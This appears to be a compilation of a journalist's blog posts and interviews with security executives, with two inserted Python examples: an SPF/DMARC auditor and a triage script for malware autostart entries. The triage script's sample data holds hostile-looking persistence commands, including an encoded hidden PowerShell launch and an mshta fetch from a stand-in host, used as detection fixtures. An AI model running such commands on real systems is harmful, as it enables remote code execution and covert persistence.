Should every coder become a manager?

Too often in tech I see stellar coders (and other technical types) reach the point where they are offered a job as a manager. Do they take the promotion and get the corresponding raise in pay and responsibility? Or stay put and continue to write code? The choice isn’t an easy one.

My first big promotion came in my mid-30s, when I was working at PC Week. I had made the move to tech journalism from working in various IT departments, and I was given the chance to run about a third of the magazine’s editorial operations. The promotion required a move from LA to Boston. I can tell you the exact date by a photo of a cake that was baked in my honor by the IT department at Coke Foods, which I happened to be visiting that week. The cake was a copy of a typical front page of the publication. (Sorry about the photos, I had no idea that I was taking them for posterity.)

This promotion was exactly right for me — I went on to run other tech pubs (Network Computing, Tom’s Hardware, various EETimes sister websites, and Inside Security) and work with dozens of editors, artists, and other creative types.

But I came across a more typical situation where the promotion brings about more trouble than success. I was listening to this podcast between Avast CISO Jaya Baloo and Troy Hunt. Hunt has run the site Have I Been Pwned for several years, largely through his own interest in exposing the weaknesses that data breaches reveal. (Note: I have worked with Baloo and write numerous blog posts for Avast.) He mentions how the site got its start when he was promoted to engineering manager at Pfizer and was miserable, because it took him out of the day-to-day coding challenge. While he was getting more influence within the organization, he was also missing out on the joys of coding and building something significant. His dissatisfaction was a good thing for all of us because he has done a bang-up job running HIBP, as it is known. (For those of you unfamiliar with hacker lingo, “pwned” is what hackers do when they succeed at compromising your credentials and breaking into your system.)

The podcast covers other topics besides Hunt’s promotion. It is worth listening to because it shows the nuanced approach that Hunt has towards running such an influential site, and how he has to play dodge-the-lawyer when he tries to get confirmation that a breach has actually occurred. Still, this is a reminder that not all promotions are the best direction for our careers. I wish I could send him a cake in appreciation!

Marketing in the time of the Covid

I have been doing a couple of podcast interviews with marketing executives over the past couple of weeks: one with Domo (a cloud BI company that I did hands-on tests of several years ago) and one with Talend (a cloud data integration vendor). Both faced big challenges during the pandemic, such as turning their in-person user conferences into all-virtual ones and changing their marketing to adjust to the new virtual way of doing business. You would think that the marketing would be pretty much the same, since both companies operate primarily in the cloud. But you would be wrong. When it comes to enterprise B2B software sales, you need road warriors and a personal high-touch. But the old-school days of customer wine-and-dine are gone. You have to be more creative about building those connections these days.

Talend hired a completely new leadership team (which interestingly are all women) and as a result went through a series of rebranding efforts. “Data is the difference between surviving and thriving,” says Lauren Vaccarello, the CMO of Talend on our podcast. She watched one of her favorite tea shops close their doors in a couple of weeks and lay off hundreds of their staff. That motivated her to rethink their messaging and start fresh, assuming that everything will change. “We have a product that can help businesses with better and real-time access to their data.”

“We can’t rely on anything, we have to innovate and change what we did a year ago,” she said. For example, they could pull customer executives together in a webinar rather than rely on those who could attend a physical meeting. Not to mention that virtual events were a lot less costly and had a lot higher attendance and engagement too. “From an ROI perspective, we got 5x higher returns than from an in-person event.” Having an all-female executive team at Talend is an interesting experience for all of them. “None of us feel the need to be perfect around each other,” she said. That makes for more intense, authentic and productive collaboration too. “The dynamic is different.”

Domo had a similar experience and just a few days to transform their customer event into a virtual one. It went from about 3,000 attendees to more than 12,000 virtual visitors, and from three days’ worth of sessions to one 90-minute plenary session with dozens of break-out sessions that could be streamed on demand.

One of my biggest beefs with SaaS companies is how hard it is to price their services. Compare Domo’s pricing page with Talend’s (shown here) — the latter is very transparent and very clear, and a rarity.

I want to bring in a post from Salesforce which talks about ways marketers can fight digital fatigue. The authors cite that the average person now spends 7.5 hours daily in front of a screen. They have several suggestions on how to beef up your own marketing efforts during these pandemic times, including:

  • Follow your customers as they change usage patterns and try new products. Stay top of mind and evolve with them. Don’t stop your marketing efforts.
  • Personalization is critical. As customers curate their digital experiences, make sure you have a better understanding of their needs and what matters to them. But don’t cross over into being creepy.
  • Agile is here to stay. Understand this evolution and how customers are responding to your content.
  • Social media matters. Make sure you can engage your customers on the various social platforms where they talk about your products.
  • Empathy is important. Show your customers that you care and respond to their concerns. Above all else, avoid the hard sell and be authentic.


HPE blog: CISO faces breach on first day on the job

Avast CISO Jaya Baloo has many lessons learned from her years as a security manager, including how to place people above systems, create a solid infrastructure plan, and the best ways to fight the bad guys.

Most IT managers are familiar with the notion of a zero-day exploit or finding a new piece of malware or threat. But what is worse is not knowing for several months that your company has been hacked. That was the situation facing Jaya Baloo when she left her job as the corporate information security officer (CISO) for the Dutch mobile operator KPN and moved to Prague-based Avast. She literally walked into her first day on the job having to deal with a breach that had been under way for months.

Baloo had several reasons for considering a move to Avast, which makes a variety of anti-malware and VPN tools and has been in business for more than three decades. “When I interviewed with their senior management, I thought that we were very compatible, and I thought that I totally fit in with their culture.” She liked that Avast had a global customer reach and that she would be working for a security company.

But after she accepted her job offer, the IT staff found evidence in late September that their environment had been penetrated since May. The evidence pointed to a compromised credential for their internal VPN. Baloo’s first day at Avast was October 1, and in the first three weeks she had numerous fires to put out. She never thought making the move to Avast was going to be a challenge. “Before I got there, I thought the biggest downside was that it was going to get boring. I thought this job was going to be a piece of cake.”

Fat chance of that. During those first weeks she quickly realized that she had to solve several problems. First was to figure out what happened with the intrusion and what damage was done. As part of this investigation, she had to go back in time six months and examine every product update that was sent out to ensure that Avast’s customers weren’t infected. This also led to understanding which parts of their software supply chain were compromised. These things weren’t easy and took time to track down. They were hampered by logs that were incomplete or misleading. Evidence also had been inadvertently deleted.

Second was to build up trust in her staff. During her interviews, Baloo was very hopeful. “I felt that I didn’t have to sell them on the need for security, since that was their focus and their main business. I thought that they would be a source of security excellence.” To her surprise, she found out that they were a typical software company, “with silos and tribes and different loyalties just like everyone else.” As she began working there, she also had to climb a big learning curve. “I didn’t know who to believe and who had the right information or who was just being a strong communicator,” she told me. The problem was not that Avast staffers were deliberately lying to her, but that it took time to get perspective on the breach details and to understand the ground truth of what happened during and after the breach. Some stories were harder to elicit because staffers weren’t used to her methods.

Finally, she had to develop a game plan to restore order and confidence, and to ensure that the breach was fully contained. She made several decisions to revoke and re-issue certificates, to send out new product updates and to begin the process to completely overhaul the company’s network and protective measures. Twenty days into the job, she posted a public update that described these steps.

In my conversations with Baloo, I realized that she had developed a series of tenets from her previous jobs as a security manager. I call them Jaya’s CISO Gems.

  1. You have to continuously doubt yourself. First and foremost, avoid complacency and be paranoid about your own capabilities. “You need to have a plan for widening your own field of view, security knowledge and perspective. You have to include more potential threats and need to challenge yourself daily. If you don’t, everything is going to look normal.” Baloo told me that many security staffers have a tendency to pay more attention to their systems, and if a system isn’t complaining or issuing alerts, then the staff thinks all is well. This complacency can be dangerous, because “you tend to hunt for things that you expect and that means you are only going to find things you are looking for.” Part of the issue is that you have to be on the lookout for the unexpected and push the envelope and have a plan for improving your own security knowledge and skills.
  2. Trust people before systems. “We have a lot of faith invested in our systems, but not necessarily in our people. That is the reverse of what it should be. We tend to focus in our comfort zone, and our zone is in tech and metrics.” But a CISO needs to listen to her team. “I like a team that can tell you when you are wrong, because that is how you learn and grow in the job and have a culture that you promote too. And above all to do it with a sense of humor.”
  3. Build a functional SOC, not just a stage set. “A SOC should support your people, not have ten thousand screens that are pretty to look at but that really say nothing. The utility of a SOC is to be able to provide the subtle clues that something is wrong with your infrastructure. As an example, you may still have firewall rules that allow for malware to enter your network.” Whether you have your own SOC or outsource it, its capabilities should match what is going on across your network.
  4. Everything in your infrastructure is suspect. Trust nothing and scan everything. She suggests starting with monitoring your oldest gear first, which is what Avast did after they found the breach. “Stop making excuses for this older equipment and make sure you don’t take away the possibility that you need to fix something old. You can’t be afraid of scanning something because this aging system might go down. Do pen testing for real.” Part of a good monitoring program is to do it periodically by default, and make sure that all staff know what the IT department is monitoring. “The goal isn’t big brother style monitoring but to find oddball user behavior and to make it visible. With cybersecurity, prayer is not an option.”
  5. Do your own phishing awareness training and do it often. While there are any number of awareness vendors that can help set up a solid program, the best situation is to craft your own. “You know your own environment best and it isn’t hard to create believable emails that can be used as a learning moment with those users who end up clicking on the bait. Phishing awareness training is really a people problem and it is very hard to get significant improvement, because all it takes is one person to click on something malicious. We were always successful at getting people to click. For example, we sent out one email that said we were changing the corporate policy on free coffee and tea and had users enter their credentials for a survey.” Part of rolling your own awareness program is being up on the latest email authentication protocols such as DMARC, DKIM and SPF so you can have confidence in your controls.
  6. Make sure you set the appropriate level of security awareness for every specific job role. “You don’t want your entire company knowing everything about your complete security policy, just what is needed for them to do their jobs,” she said. “And we should tell them how to do their jobs properly and not focus on what they are doing wrong, too.” As an example, she cites that the customer care department should understand the best practices on how to handle customer data.
  7. CISOs should be as technical as possible. “I see a lot of CISOs that come from a higher-level risk management background and don’t take the time or have the skills to understand the details of how their security technology works. You shouldn’t be afraid to dive deeper.” She also sees CISOs that come from a regulatory background. Some of the biggest attacks, such as Target, were compliant with regulations at the time. Compliance (such as with satisfying GDPR) has turned into a paper exercise rather than checking firewall rules or doing more technical checks. Instead, you get caught up in producing “compliance porn that gets sent to the board and then you get pwned. Stuff gets lost in translation to management, and you need this technical background.”
  8. Prioritize your risk intelligence. You have to know what to act on first; it is all about triage. “You fix someone with a heart attack before fixing a broken bone,” she says. This means matching risk with relevance, as I mention in my blog post for RSA here. Part of this is doing a level of sanity checking with other organizations to see what they have included in their risk profiles. Don’t do the easy stuff first just because it is easy.
  9. Don’t panic and destroy evidence. As Baloo found out during her response to their own attack, you need to understand that an infected PC can be useful in understanding your response. “Every member of the enterprise needs to be part of your response,” she says. Part of this is being trained in how to preserve evidence properly.
  10. Start with open source security tools first. “I am not a fan of building custom security software unless nothing like it exists on the market and it is absolutely necessary. And if you write your own tools, go the open source route and embrace it entirely: build it, make it available with peer review and let someone else kick it. I have seen too many custom systems that never get updated.”
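Gem 5 says to know DMARC, DKIM and SPF well enough to have confidence in your controls. The following is an added example, not code from the post or from Avast: it audits constructed SPF and DMARC TXT records (the domain names and records are made up) and reports where the policy is only monitoring rather than enforcing. The DNS lookup limit and tag names come from the SPF and DMARC specifications; everything else is an assumption about what a defender would want flagged.

```python
# Added example (not from the post): audit constructed SPF and DMARC TXT
# records to see whether a domain's email-authentication controls actually
# enforce anything, which is what a home-grown phishing program relies on.
import re

# Constructed sample records for made-up domains (not real DNS data).
SAMPLE_RECORDS = {
    "example.test": {
        "spf": "v=spf1 include:_spf.mailhost.test ip4:192.0.2.0/24 ~all",
        "dmarc": "v=DMARC1; p=none; rua=mailto:dmarc@example.test",
    },
    "strict.test": {
        "spf": "v=spf1 include:_spf.mailhost.test -all",
        "dmarc": "v=DMARC1; p=reject; pct=100; rua=mailto:dmarc@strict.test; adkim=s; aspf=s",
    },
    "weak.test": {
        "spf": "v=spf1 +all",
        "dmarc": None,  # no DMARC record published at all
    },
}

# SPF terms that cost a DNS lookup (RFC 7208 caps these at 10 per evaluation).
LOOKUP_TERMS = ("include:", "a", "mx", "ptr", "exists:", "redirect=")


def parse_spf(record):
    """Return (mechanisms, all_qualifier) for an SPF record, or (None, None) if invalid."""
    if record is None:
        return None, None
    parts = record.split()
    if not parts or parts[0].lower() != "v=spf1":
        return None, None
    mechanisms, all_qual = [], None
    for term in parts[1:]:
        m = re.fullmatch(r"([+\-~?]?)all", term, re.IGNORECASE)
        if m:
            all_qual = m.group(1) or "+"  # a bare "all" defaults to "+"
        else:
            mechanisms.append(term)
    return mechanisms, all_qual


def parse_dmarc(record):
    """Return a dict of DMARC tags (lowercased keys), or None if missing/invalid."""
    if record is None:
        return None
    tags = {}
    for item in record.split(";"):
        if "=" in item:
            k, v = item.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    if tags.get("v", "").upper() != "DMARC1" or "p" not in tags:
        return None
    return tags


def audit_domain(spf_record, dmarc_record):
    """Return a list of weakness findings; an empty list means both records enforce."""
    findings = []
    mechanisms, all_qual = parse_spf(spf_record)
    if mechanisms is None:
        findings.append("spf: missing or invalid record")
    else:
        if all_qual in (None, "+"):
            findings.append("spf: no restriction (missing or +all): any sender passes")
        elif all_qual == "?":
            findings.append("spf: ?all is neutral, not enforcing")
        elif all_qual == "~":
            findings.append("spf: ~all softfail only; relies on DMARC to act")
        lookups = [m for m in mechanisms
                   if m.lower().lstrip("+-~?").startswith(LOOKUP_TERMS)]
        if len(lookups) > 10:
            findings.append("spf: more than 10 lookup terms; record evaluates as permerror")
    tags = parse_dmarc(dmarc_record)
    if tags is None:
        findings.append("dmarc: missing or invalid record")
    else:
        policy = tags["p"].lower()
        if policy == "none":
            findings.append("dmarc: p=none monitors only; spoofed mail is still delivered")
        pct = int(tags.get("pct", "100"))
        if policy != "none" and pct < 100:
            findings.append(f"dmarc: pct={pct} applies the policy to only part of the mail")
        if "rua" not in tags:
            findings.append("dmarc: no rua address, so no aggregate reports to learn from")
    return findings


def audit_all(records=SAMPLE_RECORDS):
    """Audit every sample domain; returns {domain: [findings]}."""
    return {d: audit_domain(r["spf"], r["dmarc"]) for d, r in records.items()}


if __name__ == "__main__":
    for domain, findings in audit_all().items():
        print(domain, "->", findings or ["enforcing"])
```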

Brian NeSmith, providing SOC-as-a-Service with Arctic Wolf Networks

Brian NeSmith is the CEO of Arctic Wolf Networks, which was started back in 2012. They provide Security Operations Center-as-a-Service. I have known him for decades, since he started a quirky company called CacheFlow that eventually became part of Blue Coat, where he was also CEO. I asked him a few questions.

Q: What has changed in enterprise infosec compared to when you first started at AWN six years ago?

Back when we started the company, breaches were smaller with little lasting damage. The stakes are much higher profile now. We started the company before Target, Equifax and Petya, major attacks that put cybersecurity on the evening news. Nowadays cybersecurity is a boardroom topic, and a company’s brand and business are affected by how good their security is.

Q: How does SOC-as-a-Service differ from an MSP that just sells managed SOC services?

SOC-as-a-service provides experienced security analysts doing real security work. MSPs selling managed SOC services are usually just managing the infrastructure or forwarding alerts, but they are not doing the actual security work. The pressing issue in our industry today is how we detect and respond to threats and not just managing the infrastructure more cost effectively. SOC-as-a-service provides that, and managed SOC services from an MSP do not.

Q: What portion of your current customers’ resources that you monitor are on premises vs. in the cloud? How has that changed from six years ago?

The portion of cloud resources we monitor has been steadily increasing over the past six years. But the largest resource we monitor in most companies is still the employees and their endpoints. Many people view people as the weakest link in the chain, and we find that still to be the case. Most security incidents are still due to some sort of human error or mistake even when they have the best security products in place.

Q: You ran Blue Coat through some very turbulent times, when it was first called CacheFlow. How have web apps changed from those early days and will enterprises ever feel secure deploying them?

It is a completely different world today than when I first started leading CacheFlow. There is not a company out there that does not rely on a web app to operate or serve their customers. If they have not, companies do not have a choice but to embrace web apps, so they need to figure out what is needed to feel secure deploying them.

Q: Is ransomware or fileless malware more of a threat today from your POV?

I don’t think they are any more of a threat than other types of malware. Ransomware is different in that it can literally bring your business to a halt. That is very different from traditional malware. When it comes to fileless malware, the increased danger comes from how openly available information is on how to exploit these. We have seen malware become commercialized so you can literally purchase the malware you want to use and even get technical support. This means that anyone can become a hacker, and it will result in more attacks.

Interview with Yassir Abousselham, Okta CSO

I spoke to Yassir Abousselham, the CSO for Okta, an identity management cloud security vendor. Before joining Okta this past summer, he worked for SoFi, a fintech company where he built the company’s information security and privacy program. He also held leadership positions at Google, where he built both the corporate security for the finance and legal departments and the payments infrastructure security programs, as well as at Ernst & Young, where he held a variety of technical and consultancy roles during his 11-year tenure.

When he first started at E&Y, he worked for an entertainment company that hired them to examine their security issues. He found a misconfigured web server that enabled them to enter the network and compromise systems within the first 30 minutes of testing. This got him started in finding security gaps and was when he first realized that security is only as good as your weakest link. “The larger the environment and the more IT infrastructure, the harder it is to maintain these systems.” Luckily they weren’t billing by the hour for that engagement! He went on to produce a very comprehensive look at the company’s security profile, which is what they needed to avoid situations like what he initially found.

“The worst case is when companies do what I call check mark compliance assessments,” he said, referring to when companies are just implementing security and not really looking closely at what they are doing. “On the other hand, there are a few companies who do take the time to find the right expertise to actually improve their security posture.”

“To be effective, you have to design many security layers and use multiple tools to protect against any threats these days. And you know, the tools and the exploits do change over time. A few years ago, no one heard about ransomware for example.” He recommends looking at security tools that can help automate various processes, to ensure that they are done properly, such as automated patching and automated application testing.

In the few months he has been at Okta, they have yet to experience any ransomware attack. “The first line of defense is educating our employees. No matter how much you do, there is always going to be one user that will open a phished attachment. Hackers will go through great lengths to socially engineer those users.” Okta employs a core security team that has multiple functions, and works closely with other departments that are closer to the actual products to keep things secure. They also make use of their own mobile management tool to secure their employees’ mobile devices. “We allow BYOD but before you can connect to our network, your device has to pass a series of checks, such as not being rooted and having a PIN lock enabled and running the most updated OS version,” he said.

How does securing the Google infrastructure compare to Okta? “They have a much more complex environment, for sure.” That’s an understatement.

Working for an identity vendor like Okta, “I was surprised that single sign-on or SSO is not more universally deployed,” he said. “Many people see the value of SSO but sometimes take more time to actually get to the point where they actually use this technology. Nevertheless, SSO and multi-factor authentication are really becoming must-have technologies these days, just like having a firewall was back 20 years ago. It makes sense from a security standpoint and it makes sense from an economics standpoint too. You have to automate access controls and harden passwords, as well as be able to monitor how accounts are being used and be able to witness account compromises.” He compares not having SSO to putting a telnet server on the public Internet back in the day. “It is only a matter of time before your company will be compromised. Passwords aren’t enough to protect access these days.”

How the Okada Manila Luxury Resort Built its Greenfield IT Infrastructure

When you hear about an IT staff that has to build their infrastructure from scratch to support a new business, you think, “That couldn’t be that hard – they had no legacy infrastructure to support. What a dream job.” Well, it wasn’t a piece of cake for the crew at the Okada Manila resort hotel, and in an interview with Dries Scott, the SVP of IT for Okada, I got to see why.

Okada was built on a huge site and is similar to the resort-style properties that can be found in Las Vegas and Macau. It will house 2,300 guest rooms when it is fully built and have 10,000 employees. Scott’s IT department has at least 100 of them full-time — plus contractors — to support 2,000 endpoints and numerous physical and virtual servers placed in two separate datacenters on the property.

Scott actually worked for a few of the Macau resort hotels before coming to Manila, and he wanted to create the ideal IT environment for a five-star luxury hotel. “The biggest decision we had to make was to try to steer clear of having actual desktop PCs as our workstations,” he said to me when he sat down for an interview yesterday. “When you are starting from a clean sheet of paper, you want something that could last 10 to 20 years and want products that could evolve over this time period.” He decided to choose VDI for his endpoints. “I wanted to move away from the usual desktop PC environment, although we ended up having a few of them for our staff. PCs are a pain to manage, because hard drives crash, getting updates and patches distributed isn’t easy, and other issues.” To support their VDI deployment they purchased a variety of products, including XenDesktop, XenApp and NetScaler, HP thin clients and Dell servers.

One of the key enabling technologies is FSLogix Office 365 Container. “This makes Outlook running on XenApp and XenDesktop able to mount users’ profiles as if they were on a local C: drive, so Windows acts normally and Outlook works like it is running on a regular PC desktop,” he said. This means you get the performance of the virtual workspace but the ease of management too.

Having a VDI solution meant some initial support hurdles. “We had to have a lot of patience with our users, some of whom were using VDI workstations for the first time,” he told me. “I could have taken the easy way out and just bought desktops for everyone, but I knew eventually VDI will pay off and benefit us in the long run.”

One concern Scott had was keeping corporate data secure. Given the market of his resort, he wanted to ensure that customers’ information stayed on the corporate systems; “It is one of our most critical assets,” he said. “Users don’t have the ability to remove any corporate data from the company.” His thin clients locked out USB access, for example, and he also set up appropriate data leak policies. Through ShareFile, he has other policies for how files can be shared across his staff, and he prevents access to public SaaS repositories, like consumer file-sharing services, whenever possible. Finally, he figured out ways to keep data from his construction contractors on his servers. “I didn’t want them to pack up their PCs and leave with my data on them,” he said.


Building a new resort’s IT infrastructure wasn’t as easy as I was assuming, mainly because some IT elements needed to be put in place during the construction phase to support those workers on the job site. This meant erecting temporary buildings and networks and then migrating these resources to the production environment once the hotel was built. “That migration wasn’t easy, but we are just about through that process,” he said. “We have certainly been through a bit of a bumpy road.” One of his recommendations was to use Citrix consulting services in setting up his environment and helping define the appropriate computing architecture. “They can help make everything stable from the beginning and figure out your app and server configurations.”

What helped him pull off this project? Executive buy-in. “Our chairman is an engineer and very much into technology. It was a massive help that he supported our decisions from day one. All he wanted was to implement my vision and he gave me the ability to implement it.”

Thoughts on cybersecurity from Krishnan Chellakarai at Gilead Sciences

I spoke to Krishnan Chellakarai about his thoughts. He is currently the Director, IT Security & Privacy at Gilead Sciences and has been a security manager at several biotech firms in the past. One thing he is concerned about is the increasing threats from IoT. He gave me a theoretical example. “What happens if you are reading your emails on your Apple Watch and you click on a phished link? This could lead to a hacker gaining access to credentials and using this information to steal information from your network.” As users bring in more Fitbits and other devices with Internet access to corporations, “every company needs to worry about this threat vector because it is a foot in the door.” This is part of a bigger trend, where “we have less data stored on individual devices, but there is more access” across the corporation. What this means is that there is “less visibility for IT security pros in case of an exploit.”

Certainly, some of the responsibility for keeping a firm’s infrastructure secure has to lie with each individual user. Chellakarai asks if “people ever look at their Gmail last account activity in the right bottom corner?” Or do we ever click on the security link that pops up when you are signed in to your account from multiple places? This is food for thought. “IT managers need to put some common sense controls in place so they can have better network visibility,” he says. Another example: when was the last time anyone checked their printer firmware or other legacy devices to ensure that they have been brought up to the latest versions? “It is time to stop thinking of security after an app is built, and start thinking about security from the beginning, when you are planning your architecture and building your apps.”

Chellakarai says, “One of my first things when I start working for a new company is to do a data analysis and network baseline, so that I can understand what is going on across my infrastructure. It is so critical to do this, and especially when you join a company. I look at policies that aren’t being enforced and other loopholes too. Then I can prioritize and focus on the risks that I find.”

Lenny Zeltser is teaching us how malware operates

Lenny Zeltser has been teaching security classes at SANS for more than 15 years now and has earned the prestigious GIAC Security Expert professional designation. He is not some empty suit but a hands-on guy who developed the Linux toolkit REMnux that is used by malware analysts throughout the world. He is frequently quoted in the security trades and recently became VP of Products of Minerva Labs and spoke to me about his approach to understanding incident response, endpoint protection and digital forensics.

“I can’t think about malware in the abstract,” he said. “I have to understand it in terms of its physical reality, such as how it injects code into a running process and uses a command and control network. This means I have to play with it to learn about it.”

“Malware has become more elaborate over the past decade,” he said. “It takes more effort to examine it now. Which is interesting, because at its core it hasn’t changed that much. Back a decade or so, bots were using IRC as their command and control channel. Now of course there is much more HTTP/HTTPS-based connections.”

One interesting trend is that “malware is becoming more defensive, as a way to protect itself from analysis and automated tools such as sandboxes. This makes sense because malware authors want to derive as much value as they can and try to hide from discovery. If a piece of malware sees that it is running on a test machine or inside a VM, it will just shut down or go to sleep.”

Why has he made the recent move to working for a security vendor? “One reason is because I want to use the current characteristics of malware to make better protective products,” he said. Minerva is working on products that try to trick malware into thinking that it is running in a sandbox when it is actually sitting on users’ PCs, as a way to shut down the infection. Clever. “Adversaries are so creative these days. So two can play that game!”

Another current trend for malware is what is called “fileless,” or the ability to store as little as possible in the endpoint’s file system. While the name is somewhat misleading – you still need something stored on the target, whether it be a shortcut or a registry key – the idea is to have minimal and less obvious markers that your PC has been infected. “Something ultimately has to touch the file system and has to survive a reboot. That is what we look for.”
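Zeltser’s point is that even fileless malware has to leave something that survives a reboot, typically a registry autostart value or a Startup-folder shortcut, and that is what defenders look for. The following is an added example, not code from Zeltser or Minerva: it triages a constructed list of autostart entries (made-up names and command lines) and explains why each one deserves a look. The list of script hosts and the flag patterns are assumptions about what a defender would want flagged, not anything from the post.

```python
# Added example (not from the post): triage autostart entries for the
# "survives a reboot" footprint of fileless malware, such as a Run-key value
# or Startup shortcut that launches a script host instead of a real program.
import re

# Constructed sample autostart entries (location, name, command line).
# They are illustrative, not data collected from any real machine.
SAMPLE_ENTRIES = [
    ("HKCU\\...\\Run", "OneDrive",
     r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("HKCU\\...\\Run", "Updater",
     r'powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA'),
    ("HKLM\\...\\Run", "SecurityHealth",
     r'C:\Windows\System32\SecurityHealthSystray.exe'),
    ("Startup folder .lnk", "report.lnk",
     r'wscript.exe //e:jscript C:\Users\alice\AppData\Roaming\report.txt'),
    ("HKCU\\...\\RunOnce", "cfg",
     r'mshta.exe https://updates.example.invalid/cfg.hta'),
]

# Assumed list: binaries that run scripts or in-memory code rather than an
# application of their own. A real program in a Run key rarely needs these.
SCRIPT_HOSTS = ("powershell", "pwsh", "wscript", "cscript", "mshta",
                "rundll32", "regsvr32", "cmd.exe")

# Paths an ordinary user can write to; a script host reading from here is
# the classic fileless foothold (the script itself is the only file on disk).
USER_WRITABLE = re.compile(r"\\(AppData|Temp)\\|\\Users\\[^\\]+\\(Downloads|Public)\\",
                           re.IGNORECASE)


def launched_executable(command):
    """Return the program an autostart command line launches, lowercased."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', command)
    return (m.group(1) or m.group(2) or "").lower() if m else ""


def triage_entry(location, name, command):
    """Return the reasons this entry deserves analyst attention ([] if none)."""
    reasons = []
    low = command.lower()
    exe = launched_executable(command)
    host = next((h for h in SCRIPT_HOSTS if h in exe), None)
    if host:
        reasons.append(f"launches script host {host}")
    if re.search(r"(^|\s)-(e|ec|enc|encodedcommand)\s", low):
        reasons.append("encoded command argument")
    if re.search(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b", low):
        reasons.append("hidden/non-interactive flags")
    if "javascript:" in low or "vbscript:" in low:
        reasons.append("inline script protocol handler")
    if re.search(r"https?://", low):
        reasons.append("fetches remote content at logon")
    if host and USER_WRITABLE.search(command):
        reasons.append("script host reads from a user-writable path")
    if location.startswith("HKCU") and host:
        reasons.append("per-user autostart needs no admin rights to plant")
    return reasons


def triage_all(entries=SAMPLE_ENTRIES):
    """Triage every entry; returns {name: [reasons]} so empty lists are visible too."""
    return {name: triage_entry(loc, name, cmd) for loc, name, cmd in entries}


if __name__ == "__main__":
    for name, reasons in triage_all().items():
        print(f"{name:16} {'REVIEW' if reasons else 'ok    '} {'; '.join(reasons)}")
```

Entries with no reasons still need to be checked against a known-good baseline of signed binaries; this triage only narrows the list, as Zeltser notes that seeing what the malware does comes before mitigating it.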

Still, no matter how sophisticated a piece of malware is, there is always user error that you can’t completely eliminate. “I still see insiders who inadvertently let malware loose – maybe they click on an email attachment or they let macros run from a Word document. Ultimately, someone is going to try to run malicious code someplace; they will get it to where they want to.”

“People realize that threats are getting more sophisticated, but enterprises need more expertise too, and so we need to train people in these new skills,” he said. One challenge is being able to map out a plan post-infection. “What tasks do you perform first? Do you need to re-image an infected system? You need to see what the malware is doing, and where it has been across your network, before you can mitigate it and respond effectively,” he said. “It is more than just simple notification that you have been hit.”

I asked him to share one of his early missteps with me, and he mentioned when he worked for a startup tech company that was building web-based software. The firm wanted to make sure their systems were secure, and paid a third-party security vendor to build a very elegant and complex series of protective measures. “It was really beautiful, with all sorts of built-in redundancies. The only trouble was we designed it too well, and it ended up costing us an arm and a leg. We ended up overspending to the point where our company ran out of money. So it is great to have all these layers of protection, but you have to consider what you can afford and the business impact and your ultimate budget.”

Finally, we spoke about the progression of technology and how IT and security professionals are often unsure when it comes to the shock of the new. “First there were VLANs,” he said. “Initially, they were designed to optimize network performance and reduce broadcast domains. And they were initially resisted by security professionals, but over time they were accepted and used for security purposes. The same thing initially happened with VMs and cloud technologies. And we are starting to see containers become more accepted as security professionals get used to them. The trick is to stay current and make sure the tools are advancing with the technology.”

The view from Joshua Belk, former FBI CSO

Joshua Belk is the co-founder of the security startup Opsec360. Previously, he was the cybersecurity manager at the electric utility PG&E and the CSO for the FBI back at the beginning of this decade.

His earliest memory of a security issue was with managing people: “I have found that no matter how comprehensive our policies may be, if you don’t have the right culture among your workforce they won’t matter. Education, understanding, and inclusion are the ways to build the right security environment.”

He is drawn to tools that provide useful analytics. “With TB of data available to your team, trying to find the needle in the haystack can be a challenge. Each tool has its place in your security architecture so picking one is difficult, but those which are capable of providing me good information for analysis are the ones I prefer. That said, knowing your use cases and setting up your tools is probably the biggest impact to any security organization.”

His best advice for dealing with insider threats is to first, start with the basics. “Many companies have not taken adequate measures to protect their information or environments. At the lowest level, access provisioning, data classification, and updated antivirus and firewalls are all mandatory but when new systems or services get introduced into your environment the effects are often not well known. Protect against the drift.”

He sees MDM as a careful balance between protecting the employee and preventing unauthorized access. “At the core of the issue, no one wants their data put at risk and most users and organizations are willing to conform to a good policy in order to protect themselves.”


Like what you are reading?

Subscribe to Inside Security!

Interview with IT Manager Paul Lanzi

Paul Lanzi is the COO and co-founder of Remediant, an IT security startup that has created a product to protect privileged accounts. Prior to this startup, he worked for many years as an IT manager in the biotech field, managing various engineering teams for Genentech and then Roche.

Back 11 years ago when he started at Genentech, the first security problem he helped tackle was dealing with managing multiple accounts. “Everyone had multiple accounts and multiple passwords, and we built our own home-grown system to consolidate these accounts, and make it easier for everyone to use a single username and password to get all of their work done. That actually improved security, since it lessened the chance that someone would have to write down their multiple passwords somewhere — but it also made it easier to ensure that every employee had the right access to do their job.”

Of course, today we have both single sign-on products to federate identities, such as Okta and Ping Identity, and identity governance products such as Sailpoint and RSA Archer. But back then this was hard work.

Lanzi’s best security tool has been multi-factor authentication. “I turn it on wherever I can, it is truly one of the most under-appreciated tools around. While it isn’t perfect, this technology sits in that rare sweet spot between simplicity and security,” he said. In his present firm he uses a combination of Google Authenticator and Yubikey Nano devices for this purpose. “I am amazed at how much crypto they can cram into that Nano form factor,” he said, which is about the size of a thumbnail.

A decade or so ago, Lanzi was involved in rolling out 110,000 iPads globally at Genentech/Roche. “At the time, it was the largest non-education deployment of iPads in the world, and we used MobileIron’s MDM software to protect both our data at rest and in flight. Their MDM-based security capabilities gave us the ability to remotely wipe the fewer than 20 devices that were lost or misplaced each month. Its combined capabilities gave us assurance that when those devices were lost, the data on them was still secure. We could also enforce minimum OS version standards, to ensure that users were keeping them up to date with OS security updates.”

Genentech/Roche had a very unusual security staff, composed of folks from different departments. “We had separate teams for patching desktops, maintaining our network infrastructure, an IT Security policy writing group, an account provisioning engineering group for maintaining that piece, and an overall Security Architect as well. They contributed to an overall defense in depth because they were mutually supportive and worked together. That isn’t going to be possible in every enterprise, but we had terrific coverage across the various skills and potential threat areas. And given that we had personnel split across South San Francisco, Madrid and Basel, Switzerland, it was pretty impressive.”

How has security changed among his various employers over the years? “It really depends on the level of support at the executive level. At Genentech/Roche, we had executives who understood the risks and the investment needed to minimize the security risks. Other places were behind the curve and more focused on creating policies and lagged with their investment in security infrastructure. Part of the issue is that unlike in the retail or government sectors, biotech hasn’t had the big-news breaches to motivate organizations towards security improvements.”